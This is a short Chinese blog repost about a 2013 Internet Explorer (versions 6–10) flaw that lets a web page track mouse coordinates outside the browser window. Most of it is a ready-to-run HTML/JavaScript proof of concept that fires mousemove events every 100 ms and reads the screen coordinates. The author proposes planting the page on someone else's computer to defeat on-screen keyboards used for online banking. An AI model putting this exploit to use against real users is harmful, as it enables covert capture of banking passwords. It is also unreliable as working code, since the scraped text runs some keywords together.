您的位置:首页 > 其它

IE浏览器鼠标坐标跟踪安全风险,通杀全版本

2013-01-21 17:17 232 查看
刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。影响版本:IE6-10测试:在系统目录下新建一个html文件,代码如下:
<!DOCTYPEhtml>
<html>
<head>
<metacharset="utf-8"/>
<title>ExploitDemo</title>
<scripttype="text/javascript">
window.attachEvent("onload",function(){
vardetector=document.getElementById("detector");
detector.attachEvent("onmousemove",function(e){
detector.innerHTML=e.screenX+","+e.screenY;
});
setInterval(function(){
detector.fireEvent("onmousemove");
},100);
});
</script>
</head>
<body>
<divid="detector"></div>
</body>
</html>
用IE打开新建的html文件



试想将该漏洞上传到别人的电脑对方还使用网银,以为软键盘就安全了,测试后发现不以为然。

                                            

                                        

                        
                        内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息 
                    

                    

                    

                        

                         标签: 
                                                

                        

                    


                

            


            

                
相关文章推荐

                

                
            

        

        

            

            
            

                

                    
新的分享

                    

                        
                    

                

            


            

                

                    
章节导航